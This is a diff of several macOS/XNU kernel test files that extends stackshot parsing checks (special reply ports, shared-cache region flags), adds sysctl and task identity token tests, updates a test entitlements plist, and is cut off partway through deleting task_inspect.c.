-               .name = "srp",
-               .quiet = false,
-               .flags = (STACKSHOT_THREAD_WAITINFO | STACKSHOT_KCDATA_FORMAT),
-       };
        mach_port_t port;
 
        /* setup the signal handler in the parent (server) */
@@ -1328,18 +1462,20 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre
        dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER);
        T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear");
 
+       /*
+        * can_continue indicates the client has signaled us, but we want to make
+        * sure they've actually blocked sending their mach message.  It's cheesy, but
+        * sleep() works for this.
+        */
        sleep(1);
 
        /*
         * take the stackshot without calling receive to verify that the stackshot wait
-        * info shows our (the server) PID for the scenario where the server has yet to
+        * info shows our (the server) thread for the scenario where the server has yet to
         * receive the message.
         */
        T_LOG("Taking stackshot for part 1 coverage");
-       take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
-               parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
-                               @{srp_expected_pid_key: @(getpid())});
-       });
+       check_srp_test("srp", SRP_TEST_THREAD);
 
        /*
         * receive the message from the client (which should copy the send once right into
@@ -1375,17 +1511,55 @@ T_DECL(special_reply_port, "test that tasks using special reply ports have corre
         * for the scenario where the server has received the message and copied in the send-once right.
         */
        T_LOG("Taking stackshot for part 2 coverage");
-       take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
-               parse_stackshot(PARSE_STACKSHOT_WAITINFO_SRP, ssbuf, sslen,
-                               @{srp_expected_pid_key: @(getpid())});
-       });
+       check_srp_test("srp", SRP_TEST_PID);
 
        /* cleanup - kill the client */
-       T_LOG("killing client");
-       kill(client_pid, SIGKILL);
+       T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client");
+       T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit");
+
+       // do it again, but using kevents
+       T_LOG("Launching client");
+       sp_ret = posix_spawn(&client_pid, client_args[0], NULL, NULL, client_args, NULL);
+       T_QUIET; T_ASSERT_POSIX_ZERO(sp_ret, "spawned process '%s' with PID %d", client_args[0], client_pid);
+       T_LOG("Spawned client as PID %d", client_pid);
 
-       T_LOG("waiting for the client to exit");
-       waitpid(client_pid, NULL, 0);
+       dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER);
+       T_LOG("Ready to take stackshot, but waiting 1s for the coast to clear");
+
+       /*
+        * can_continue indicates the client has signaled us, but we want to make
+        * sure they've actually blocked sending their mach message.  It's cheesy, but
+        * sleep() works for this.
+        */
+       sleep(1);
+
+       dispatch_mach_t dispatch_mach = dispatch_mach_create(SRP_SERVICE_NAME, machdq, 
+           ^(dispatch_mach_reason_t reason,
+             dispatch_mach_msg_t message,
+             mach_error_t error __unused) {
+               switch (reason) {
+               case DISPATCH_MACH_MESSAGE_RECEIVED: {
+                       size_t size = 0;
+                       mach_msg_header_t *msg __unused = dispatch_mach_msg_get_msg(message, &size);
+                       T_LOG("server: recieved %ld byte message", size);
+                       check_srp_test("turnstile_port_thread", SRP_TEST_THREAD);
+                       T_LOG("server: letting client go");
+                       // drop the message on the ground, we'll kill the client later
+                       dispatch_semaphore_signal(can_continue);
+                       break;
+               }
+               default:
+                       break;
+               }
+       });
+
+       dispatch_mach_connect(dispatch_mach, port, MACH_PORT_NULL, NULL);
+
+       dispatch_semaphore_wait(can_continue, DISPATCH_TIME_FOREVER);
+
+       /* cleanup - kill the client */
+       T_ASSERT_POSIX_SUCCESS(kill(client_pid, SIGKILL), "killing client");
+       T_ASSERT_POSIX_SUCCESS(waitpid(client_pid, NULL, 0), "waiting for the client to exit");
 }
 
 #pragma mark performance tests
@@ -1441,7 +1615,7 @@ stackshot_flag_perf_noclobber(uint64_t flag, char *flagname)
 
        dt_stat_t duration = dt_stat_create("nanoseconds per thread", "%s_duration", flagname);
        dt_stat_t size = dt_stat_create("bytes per thread", "%s_size", flagname);
-       T_LOG("Testing \"%s\" = 0x%x", flagname, flag);
+       T_LOG("Testing \"%s\" = 0x%" PRIx64, flagname, flag);
 
        while (!dt_stat_stable(duration) || !dt_stat_stable(size)) {
                take_stackshot(&scenario, false, ^(void *ssbuf, size_t sslen) {
@@ -1692,6 +1866,7 @@ static void
 parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSDictionary *extra)
 {
        bool delta = (stackshot_parsing_flags & PARSE_STACKSHOT_DELTA);
+       bool expect_sharedcache_child = (stackshot_parsing_flags & PARSE_STACKSHOT_SHAREDCACHE_FLAGS);
        bool expect_zombie_child = (stackshot_parsing_flags & PARSE_STACKSHOT_ZOMBIE);
        bool expect_postexec_child = (stackshot_parsing_flags & PARSE_STACKSHOT_POSTEXEC);
        bool expect_cseg_waitinfo = (stackshot_parsing_flags & PARSE_STACKSHOT_WAITINFO_CSEG);
@@ -1705,9 +1880,13 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
        bool found_translated_child = false;
        bool found_dispatch_queue_label = false, found_turnstile_lock = false;
        bool found_cseg_waitinfo = false, found_srp_waitinfo = false;
-       pid_t zombie_child_pid = -1, srp_expected_pid = 0;
+       bool found_sharedcache_child = false, found_sharedcache_badflags = false, found_sharedcache_self = false;
+       uint64_t srp_expected_threadid = 0;
+       pid_t zombie_child_pid = -1, srp_expected_pid = -1, sharedcache_child_pid = -1;
        pid_t translated_child_pid = -1;
+       bool sharedcache_child_sameaddr = false;
        uint64_t postexec_child_unique_pid = 0, cseg_expected_threadid = 0;
+       uint64_t sharedcache_child_flags = 0, sharedcache_self_flags = 0;
        char *inflatedBufferBase = NULL;
 
        if (expect_shared_cache_uuid) {
@@ -1732,6 +1911,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                }
        }
 
+       if (expect_sharedcache_child) {
+               NSNumber* pid_num = extra[sharedcache_child_pid_key];
+               NSNumber* sameaddr_num = extra[sharedcache_child_sameaddr_key];
+               T_QUIET; T_ASSERT_NOTNULL(pid_num, "sharedcache child pid provided");
+               T_QUIET; T_ASSERT_NOTNULL(sameaddr_num, "sharedcache child addrsame provided");
+               sharedcache_child_pid = [pid_num intValue];
+               T_QUIET; T_ASSERT_GT(sharedcache_child_pid, 0, "sharedcache child pid greater than zero");
+               sharedcache_child_sameaddr = [sameaddr_num intValue];
+               T_QUIET; T_ASSERT_GE([sameaddr_num intValue], 0, "sharedcache child sameaddr is boolean (0 or 1)");
+               T_QUIET; T_ASSERT_LE([sameaddr_num intValue], 1, "sharedcache child sameaddr is boolean (0 or 1)");
+       }
        if (expect_zombie_child) {
                NSNumber* pid_num = extra[zombie_child_pid_key];
                T_QUIET; T_ASSERT_NOTNULL(pid_num, "zombie child pid provided");
@@ -1749,15 +1939,23 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
        if (expect_cseg_waitinfo) {
                NSNumber* tid_num = extra[cseg_expected_threadid_key];
                T_QUIET; T_ASSERT_NOTNULL(tid_num, "cseg's expected thread id provided");
-               cseg_expected_threadid = [tid_num intValue];
-               T_QUIET; T_ASSERT_GT(cseg_expected_threadid, 0, "cseg_expected_threadid greater than zero");
+               cseg_expected_threadid = tid_num.unsignedLongValue;
+               T_QUIET; T_ASSERT_GT(cseg_expected_threadid, UINT64_C(0), "compressor segment thread is present");
        }
 
        if (expect_srp_waitinfo) {
+               NSNumber* threadid_num = extra[srp_expected_threadid_key];
                NSNumber* pid_num = extra[srp_expected_pid_key];
-               T_QUIET; T_ASSERT_NOTNULL(pid_num, "expected SRP pid provided");
-               srp_expected_pid  = [pid_num intValue];
-               T_QUIET; T_ASSERT_GT(srp_expected_pid , 0, "srp_expected_pid greater than zero");
+               T_QUIET; T_ASSERT_TRUE(threadid_num != nil || pid_num != nil, "expected SRP threadid or pid");
+               if (threadid_num != nil) {
+                       srp_expected_threadid = [threadid_num unsignedLongLongValue];
+                       T_QUIET; T_ASSERT_GT(srp_expected_threadid, 0ull, "srp_expected_threadid greater than zero");
+               }
+               if (pid_num != nil) {
+                       srp_expected_pid = [pid_num intValue];
+                       T_QUIET; T_ASSERT_GT(srp_expected_pid, 0, "srp_expected_pid greater than zero");
+               }
+               T_LOG("looking for SRP pid: %d threadid: %llu", srp_expected_pid, srp_expected_threadid);
        }
 
        if (expect_translated_child) {
@@ -1766,7 +1964,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                translated_child_pid = [pid_num intValue];
                T_QUIET; T_ASSERT_GT(translated_child_pid, 0, "translated child pid greater than zero");
        }
-       
+
        kcdata_iter_t iter = kcdata_iter(ssbuf, sslen);
        if (delta) {
                T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_DELTA_STACKSHOT,
@@ -1787,7 +1985,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        uint64_t *data;
                        char *desc;
                        for (int i = 0; i < 3; i ++) {
-                               kcdata_iter_get_data_with_desc(iter, &desc, &data, NULL);
+                               kcdata_iter_get_data_with_desc(iter, &desc, (void **)&data, NULL);
                                if (strcmp(desc, "kcd_c_type") == 0) {
                                        compression_type = *data;
                                } else if (strcmp(desc, "kcd_c_totalout") == 0){
@@ -1799,14 +1997,14 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                iter = kcdata_iter_next(iter);
                        }
 
-                       T_ASSERT_EQ(compression_type, 1, "zlib compression is used");
-                       T_ASSERT_GT(totalout, 0, "successfully gathered how long the compressed buffer is");
-                       T_ASSERT_GT(totalin, 0, "successfully gathered how long the uncompressed buffer will be at least");
+                       T_ASSERT_EQ(compression_type, UINT64_C(1), "zlib compression is used");
+                       T_ASSERT_GT(totalout, UINT64_C(0), "successfully gathered how long the compressed buffer is");
+                       T_ASSERT_GT(totalin, UINT64_C(0), "successfully gathered how long the uncompressed buffer will be at least");
 
                        /* progress to the next kcdata item */
                        T_ASSERT_EQ(kcdata_iter_type(iter), KCDATA_BUFFER_BEGIN_STACKSHOT, "compressed stackshot found");
 
-                       void *bufferBase = kcdata_iter_payload(iter);
+                       char *bufferBase = kcdata_iter_payload(iter);
 
                        /*
                         * zlib is used, allocate a buffer based on the metadata, plus
@@ -1819,22 +2017,28 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        z_stream zs;
                        memset(&zs, 0, sizeof(zs));
                        T_QUIET; T_ASSERT_EQ(inflateInit(&zs), Z_OK, "inflateInit OK");
-                       zs.next_in = bufferBase;
-                       zs.avail_in = totalout;
-                       zs.next_out = inflatedBufferBase;
-                       zs.avail_out = inflatedBufferSize;
+                       zs.next_in = (unsigned char *)bufferBase;
+                       T_QUIET; T_ASSERT_LE(totalout, (uint64_t)UINT_MAX, "stackshot is not too large");
+                       zs.avail_in = (uInt)totalout;
+                       zs.next_out = (unsigned char *)inflatedBufferBase;
+                       T_QUIET; T_ASSERT_LE(inflatedBufferSize, (size_t)UINT_MAX, "output region is not too large");
+                       zs.avail_out = (uInt)inflatedBufferSize;
                        T_ASSERT_EQ(inflate(&zs, Z_FINISH), Z_STREAM_END, "inflated buffer");
                        inflateEnd(&zs);
 
-                       T_ASSERT_EQ(zs.total_out, totalin, "expected number of bytes inflated");
+                       T_ASSERT_EQ((uint64_t)zs.total_out, totalin, "expected number of bytes inflated");
                        
                        /* copy the data after the compressed area */
-                       T_QUIET; T_ASSERT_LE(sslen - totalout - (bufferBase - ssbuf),
+                       T_QUIET; T_ASSERT_GE((void *)bufferBase, ssbuf,
+                                       "base of compressed stackshot is after the returned stackshot buffer");
+                       size_t header_size = (size_t)(bufferBase - (char *)ssbuf);
+                       size_t data_after_compressed_size = sslen - totalout - header_size;
+                       T_QUIET; T_ASSERT_LE(data_after_compressed_size,
                                        inflatedBufferSize - zs.total_out,
                                        "footer fits in the buffer");
                        memcpy(inflatedBufferBase + zs.total_out,
                                        bufferBase + totalout,
-                                       sslen - totalout - (bufferBase - ssbuf));
+                                       data_after_compressed_size);
 
                        iter = kcdata_iter(inflatedBufferBase, inflatedBufferSize);
                }
@@ -1931,21 +2135,61 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                        id uuid = ptr[@"imageUUID"];
 
                                        uint8_t uuid_p[16];
-                                       for (int i = 0; i < 16; i ++)
-                                               uuid_p[i] = (uint8_t) ([[uuid objectAtIndex:i] intValue]);
+                                       for (unsigned int i = 0; i < 16; i ++) {
+                                               NSNumber *uuidByte = uuid[i];
+                                               uuid_p[i] = (uint8_t)uuidByte.charValue;
+                                       }
 
                                        check_shared_cache_uuid(uuid_p);
 
+                                       uint64_t baseAddress = (uint64_t)((NSNumber *)ptr[@"imageSlidBaseAddress"]).longLongValue;
+                                       uint64_t firstMapping = (uint64_t)((NSNumber *)ptr[@"sharedCacheSlidFirstMapping"]).longLongValue;
+
+                                       T_ASSERT_LE(baseAddress, firstMapping,
+                                               "in per-task shared_cache_dyld_load_info, "
+                                               "baseAddress <= firstMapping");
+                                       T_ASSERT_GE(baseAddress + (1ull << 29), firstMapping,
+                                               "in per-task shared_cache_dyld_load_info, "
+                                               "baseAddress + 512meg >= firstMapping");
+
+                                       size_t shared_cache_len;
+                                       const void *addr = _dyld_get_shared_cache_range(&shared_cache_len);
+                                       T_ASSERT_EQ((uint64_t)addr, firstMapping,
+                                                       "SlidFirstMapping should match shared_cache_range");
+
                                        /* 
                                         * check_shared_cache_uuid() will assert on failure, so if
                                         * we get here, then we have found the shared cache UUID
                                         * and it's correct
                                         */
-                                       found_shared_cache_uuid =  true;
+                                       found_shared_cache_uuid = true;
+                               }
+                       }
+                       if (expect_sharedcache_child) {
+                               uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue];
+                               uint64_t sharedregion_flags = (task_flags & (kTaskSharedRegionNone | kTaskSharedRegionSystem | kTaskSharedRegionOther));
+                               id sharedregion_info = container[@"task_snapshots"][@"shared_cache_dyld_load_info"];
+                               if (!found_sharedcache_badflags) {
+                                       T_QUIET; T_ASSERT_NE(sharedregion_flags, 0ll, "one of the kTaskSharedRegion flags should be set on all tasks");
+                                       bool multiple = (sharedregion_flags & (sharedregion_flags - 1)) != 0;
+                                       T_QUIET; T_ASSERT_FALSE(multiple, "only one kTaskSharedRegion flag should be set on each task");
+                                       found_sharedcache_badflags = (sharedregion_flags == 0 || multiple);
+                               }
+                               if (pid == 0) {
+                                       T_ASSERT_EQ(sharedregion_flags, (uint64_t)kTaskSharedRegionNone, "Kernel proc (pid 0) should have no shared region");
+                               } else if (pid == sharedcache_child_pid) {
+                                       found_sharedcache_child = true;
+                                       sharedcache_child_flags = sharedregion_flags;
+                               } else if (pid == getpid()) {
+                                       found_sharedcache_self = true;
+                                       sharedcache_self_flags = sharedregion_flags;
+                               }
+                               if (sharedregion_flags == kTaskSharedRegionOther && !(task_flags & kTaskSharedRegionInfoUnavailable)) {
+                                       T_QUIET; T_ASSERT_NOTNULL(sharedregion_info, "kTaskSharedRegionOther should have a shared_cache_dyld_load_info struct");
+                               } else {
+                                       T_QUIET; T_ASSERT_NULL(sharedregion_info, "expect no shared_cache_dyld_load_info struct");
                                }
                        }
-                       
-                       
                        if (expect_zombie_child && (pid == zombie_child_pid)) {
                                found_zombie_child = true;
                                
@@ -1959,7 +2203,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                found_translated_child = true;
                                
                                uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue];
-                               T_ASSERT_EQ((task_flags & kTaskIsTranslated), kTaskIsTranslated, "child marked as translated");
+                               T_EXPECT_BITS_SET(task_flags, kTaskIsTranslated, "child marked as translated");
                                
                                continue;
                        }
@@ -1968,7 +2212,10 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"];
 
                                for (id i in winfos) {
-                                       if ([i[@"wait_type"] intValue] == kThreadWaitCompressor && [i[@"owner"] intValue] == cseg_expected_threadid) {
+                                       NSNumber *waitType = i[@"wait_type"];
+                                       NSNumber *owner = i[@"owner"];
+                                       if (waitType.intValue == kThreadWaitCompressor &&
+                                                       owner.unsignedLongValue == cseg_expected_threadid) {
                                                found_cseg_waitinfo = true;
                                                break;
                                        }
@@ -1978,16 +2225,27 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        if (expect_srp_waitinfo) {
                                NSArray *tinfos = container[@"task_snapshots"][@"thread_turnstileinfo"];
                                NSArray *winfos = container[@"task_snapshots"][@"thread_waitinfo"];
-
                                for (id i in tinfos) {
                                        if (!found_srp_waitinfo) {
-                                               if ([i[@"turnstile_context"] intValue] == srp_expected_pid &&
-                                                               ([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK)) {
-
-                                                       /* we found something that is blocking the correct pid */
+                                               bool found_thread = false;
+                                               bool found_pid = false;
+                                               if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_THREAD) &&
+                                                   [i[@"turnstile_context"] unsignedLongLongValue] == srp_expected_threadid &&
+                                                   srp_expected_threadid != 0) {
+                                                       found_thread = true;
+                                               }
+                                               if (([i[@"turnstile_flags"] intValue] & STACKSHOT_TURNSTILE_STATUS_BLOCKED_ON_TASK) &&
+                                                   [i[@"turnstile_context"] intValue] == srp_expected_pid &&
+                                                   srp_expected_pid != -1) {
+                                                       found_pid = true;
+                                               }
+                                               if (found_pid || found_thread) {
+                                                       T_LOG("found SRP %s %lld waiter: %d", (found_thread ? "thread" : "pid"),
+                                                           [i[@"turnstile_context"] unsignedLongLongValue], [i[@"waiter"] intValue]);
+                                                       /* we found something that is blocking the correct threadid */
                                                        for (id j in winfos) {
                                                                if ([j[@"waiter"] intValue] == [i[@"waiter"] intValue] &&
-                                                                               [j[@"wait_type"] intValue] == kThreadWaitPortReceive) {
+                                                                   [j[@"wait_type"] intValue] == kThreadWaitPortReceive) {
                                                                        found_srp_waitinfo = true;
                                                                        break;
                                                                }
@@ -2010,8 +2268,8 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                        "current process name matches in stackshot");
 
                        uint64_t task_flags = [task_snapshot[@"ts_ss_flags"] unsignedLongLongValue];
-                       T_ASSERT_NE((task_flags & kTerminatedSnapshot), kTerminatedSnapshot, "current process not marked as terminated");
-                       T_ASSERT_NE((task_flags & kTaskIsTranslated), kTaskIsTranslated, "current process not marked as translated");
+                       T_ASSERT_BITS_NOTSET(task_flags, kTerminatedSnapshot, "current process not marked as terminated");
+                       T_ASSERT_BITS_NOTSET(task_flags, kTaskIsTranslated, "current process not marked as translated");
 
                        T_QUIET;
                        T_EXPECT_LE(pid, [task_snapshot[@"ts_unique_pid"] intValue],
@@ -2032,6 +2290,7 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
 
                        bool found_main_thread = false;
                        uint64_t main_thread_id = -1ULL;
+                       bool found_null_kernel_frame = false;
                        for (id thread_key in container[@"task_snapshots"][@"thread_snapshots"]) {
                                NSMutableDictionary *thread = container[@"task_snapshots"][@"thread_snapshots"][thread_key];
                                NSDictionary *thread_snap = thread[@"thread_snapshot"];
@@ -2057,8 +2316,17 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                                                        [cpu_times[@"user_time"] intValue],
                                                        "runnable time of current thread is valid");
                                }
+                               if (!found_null_kernel_frame) {
+                                       for (NSNumber *frame in thread[@"kernel_frames"]) {
+                                               if (frame.unsignedLongValue == 0) {
+                                                       found_null_kernel_frame = true;
+                                                       break;
+                                               }
+                                       }
+                               }
                        }
                        T_EXPECT_TRUE(found_main_thread, "found main thread for current task in stackshot");
+                       T_EXPECT_FALSE(found_null_kernel_frame, "should not see any NULL kernel frames");
 
                        if (expect_turnstile_lock && !found_turnstile_lock) {
                                NSArray *tsinfos = container[@"task_snapshots"][@"thread_turnstileinfo"];
@@ -2073,10 +2341,22 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                        break;
                }
                case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: {
-                       struct dyld_uuid_info_64_v2 *payload = kcdata_iter_payload(iter);
-                       T_ASSERT_EQ(kcdata_iter_size(iter), sizeof(*payload), "valid dyld_uuid_info_64_v2 struct");
+                       struct dyld_shared_cache_loadinfo *payload = kcdata_iter_payload(iter);
+                       T_ASSERT_EQ((size_t)kcdata_iter_size(iter), sizeof(*payload), "valid dyld_shared_cache_loadinfo struct");
+
+                       check_shared_cache_uuid(payload->sharedCacheUUID);
+
+                       T_ASSERT_LE(payload->sharedCacheUnreliableSlidBaseAddress,
+                               payload->sharedCacheSlidFirstMapping,
+                               "SlidBaseAddress <= SlidFirstMapping");
+                       T_ASSERT_GE(payload->sharedCacheUnreliableSlidBaseAddress + (1ull << 29),
+                               payload->sharedCacheSlidFirstMapping,
+                               "SlidFirstMapping should be within 512megs of SlidBaseAddress");
 
-                       check_shared_cache_uuid(payload->imageUUID);
+                       size_t shared_cache_len;
+                       const void *addr = _dyld_get_shared_cache_range(&shared_cache_len);
+                       T_ASSERT_EQ((uint64_t)addr, payload->sharedCacheSlidFirstMapping,
+                           "SlidFirstMapping should match shared_cache_range");
 
                        /* 
                         * check_shared_cache_uuid() asserts on failure, so we must have
@@ -2088,6 +2368,19 @@ parse_stackshot(uint64_t stackshot_parsing_flags, void *ssbuf, size_t sslen, NSD
                }
        }
 
+       if (expect_sharedcache_child) {
+               T_QUIET; T_ASSERT_TRUE(found_sharedcache_child, "found sharedcache child in kcdata");
+               T_QUIET; T_ASSERT_TRUE(found_sharedcache_self, "found self in kcdata");
+               if (found_sharedcache_child && found_sharedcache_self) {
+                       T_QUIET; T_ASSERT_NE(sharedcache_child_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache child should have shared region");
+                       T_QUIET; T_ASSERT_NE(sharedcache_self_flags, (uint64_t)kTaskSharedRegionNone, "sharedcache: self should have shared region");
+                       if (sharedcache_self_flags == kTaskSharedRegionSystem && !sharedcache_child_sameaddr) {
+                               /* If we're in the system shared region, and the child has a different address, child must have an Other shared region */
+                               T_ASSERT_EQ(sharedcache_child_flags, (uint64_t)kTaskSharedRegionOther, 
+                                   "sharedcache child should have Other shared region");
+                       }
+               }
+       }
        if (expect_zombie_child) {
                T_QUIET; T_ASSERT_TRUE(found_zombie_child, "found zombie child in kcdata");
        }
index cedc9f7ece8b4ac4103df7cf935e906242959a38..c8f26eb5a4888b2849826cd888c62fc3d754ae6d 100644 (file)
@@ -89,7 +89,18 @@ main_test(void)
        T_EXPECT_EQ(out_buffer->entries, 1ULL, "should have 1 vm object\n");
        T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n");
 
-       /* get the list for the current process */
+       /* get the list for the current process with an overly large size */
+       out_size = SIZE_MAX;
+       memset(out_buffer, 0, output_size);
+       ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name));
+
+       T_QUIET;
+       T_EXPECT_EQ(ret, 0, "sysctlbyname failed\n");
+       T_EXPECT_EQ(out_size, 2 * sizeof(vm_object_query_data_t) + sizeof(int64_t), "sysctl return size is incorrect\n");
+       T_EXPECT_EQ(out_buffer->entries, 2ULL, "should have 2 vm objects\n");
+       T_EXPECT_NE(out_buffer->data[0].object_id, 0ULL, "vm_object_id should not be 0\n");
+
+       /* get the list for the current process with the correct output size */
        out_size = output_size;
        memset(out_buffer, 0, output_size);
        ret = sysctlbyname(g_sysctl_name, out_buffer, &out_size, &task_name, sizeof(task_name));
index 823e1123ff5ca98ed4616bfc8ddd3a96da3ed753..de9329a37c63e6dab9a14af4e5e93de64a18ad46 100644 (file)
@@ -5,6 +5,8 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist")
 {
        char buffer[64] = "";
        size_t buffer_size = sizeof(buffer);
+       int v;
+       size_t v_size;
 
        int ret = sysctlbyname("hw.target", buffer,
            &buffer_size, NULL, 0);
@@ -25,4 +27,15 @@ T_DECL(sysctl_hw_cpu, "ensure vital product and CPU-related sysctls exist")
 
        T_ASSERT_POSIX_SUCCESS(ret, "machdep.cpu.brand_string sysctl");
        T_LOG("machdep.cpu.brand_string = %s", buffer);
+
+       v = 0;
+       v_size = sizeof(v);
+       ret = sysctlbyname("hw.cpu64bit_capable", &v, &v_size, NULL, 0);
+       T_ASSERT_POSIX_SUCCESS(ret, "hw.cpu64bit_capable");
+
+#if __arm__
+       T_EXPECT_EQ(v, 0, "cpu is not 64 bit capable");
+#else
+       T_EXPECT_EQ(v, 1, "cpu is 64 bit capable");
+#endif
 }
index 2398d67f5e748056f4ed80a74c0650f61f887c24..da1e64ce342a31a2346215a16cb095651d9796e8 100644 (file)
@@ -6,5 +6,13 @@
         <true/>
         <key>task_for_pid-allow</key>
         <true/>
+
+        <key>com.apple.system-task-ports.control</key>
+        <!-- Supercedes the two above in AzulE+, cross-platfrom -->
+       <true/>
+
+        <key>com.apple.security.get-movable-control-port</key>
+        <!-- Allows for task_get_special_port(..TASK_KERNEL_PORT..) -->
+       <true/>
 </dict>
 </plist>
diff --git a/tests/task_ident_test.c b/tests/task_ident_test.c
new file mode 100644 (file)
index 0000000..8fab0e9
--- /dev/null
@@ -0,0 +1,62 @@
+#include <darwintest.h>
+#include <darwintest_utils.h>
+#include <errno.h>
+#include <mach/mach.h>
+#include <mach/mach_types.h>
+#include <mach/task.h>
+#include <mach/mach_error.h>
+#include <mach/task_special_ports.h>
+
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+T_DECL(task_ident, "test task identity token")
+{
+       kern_return_t kr;
+       task_id_token_t token;
+       mach_port_t port1, port2;
+
+       kr = task_create_identity_token(mach_task_self(), &token);
+       T_ASSERT_MACH_SUCCESS(kr, "task_create_identity_token()");
+
+       port1 = mach_task_self();
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_CONTROL, &port2); /* Immovable control port for self */
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - CONTROL");
+       T_EXPECT_EQ(port1, port2, "Control port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_get_special_port(mach_task_self(), TASK_READ_PORT, &port1);
+       T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - READ");
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_READ, &port2);
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - read");
+       T_EXPECT_EQ(port1, port2, "Read port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port1);
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_get_special_port(mach_task_self(), TASK_INSPECT_PORT, &port1);
+       T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - INSPECT");
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_INSPECT, &port2);
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - inspect");
+       T_EXPECT_EQ(port1, port2, "Inspect port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port1);
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_get_special_port(mach_task_self(), TASK_NAME_PORT, &port1);
+       T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port() - NAME");
+       kr = task_identity_token_get_task_port(token, TASK_FLAVOR_NAME, &port2);
+       T_ASSERT_MACH_SUCCESS(kr, "task_identity_token_get_task_port() - name");
+       T_EXPECT_EQ(port1, port2, "Name port does not match!");
+
+       mach_port_deallocate(mach_task_self(), port1);
+       mach_port_deallocate(mach_task_self(), port2);
+
+       kr = task_identity_token_get_task_port(mach_thread_self(), TASK_FLAVOR_NAME, &port2);
+       T_EXPECT_NE(kr, KERN_SUCCESS, "task_identity_token_get_task_port() should fail on non-token port");
+
+       mach_port_deallocate(mach_task_self(), token);
+}
index a40a5d569ed098174dec3f659a94c4222ba49240..f887beee6fee80820c1c69426e848d0f0440fd93 100644 (file)
@@ -13,6 +13,8 @@
 #include <sys/sysctl.h>
 #include <unistd.h>
 
+#include "test_utils.h"
+
 T_GLOBAL_META(T_META_RUN_CONCURRENTLY(true));
 
 /* *************************************************************************************
@@ -51,7 +53,6 @@ void test_task_basic_info_32(void);
 void test_task_basic_info_64(void);
 void task_basic_info_32_debug(void);
 void task_basic2_info_32_warmup(void);
-static int is_development_kernel(void);
 void test_task_basic_info(enum info_kind kind);
 uint64_t info_get(enum info_kind kind, enum info_get get, void * data);
 
@@ -1144,28 +1145,3 @@ info_get(enum info_kind kind, enum info_get get, void * data)
 
        __builtin_unreachable();
 }
-
-/*
- * Determines whether we're running on a development kernel
- */
-static int
-is_development_kernel(void)
-{
-#define NOTSET -1
-
-       static int is_dev = NOTSET;
-
-       if (is_dev == NOTSET) {
-               int dev;
-               size_t dev_size = sizeof(dev);
-
-               T_QUIET;
-               T_ASSERT_POSIX_SUCCESS(sysctlbyname("kern.development", &dev, &dev_size, NULL, 0), NULL);
-               is_dev = (dev != 0);
-
-               return is_dev;
-       } else {
-               return is_dev;
-       }
-#undef NOTSET
-}
diff --git a/tests/task_inspect.c b/tests/task_inspect.c
deleted file mode 100644 (file)
index b9fbe2e..0000000
+++ /dev/null
@@ -1,146 +0,0 @@
-#ifdef T_NAMESPACE
-#undef T_NAMESPACE
-#endif
-
-#include <darwintest.h>
-
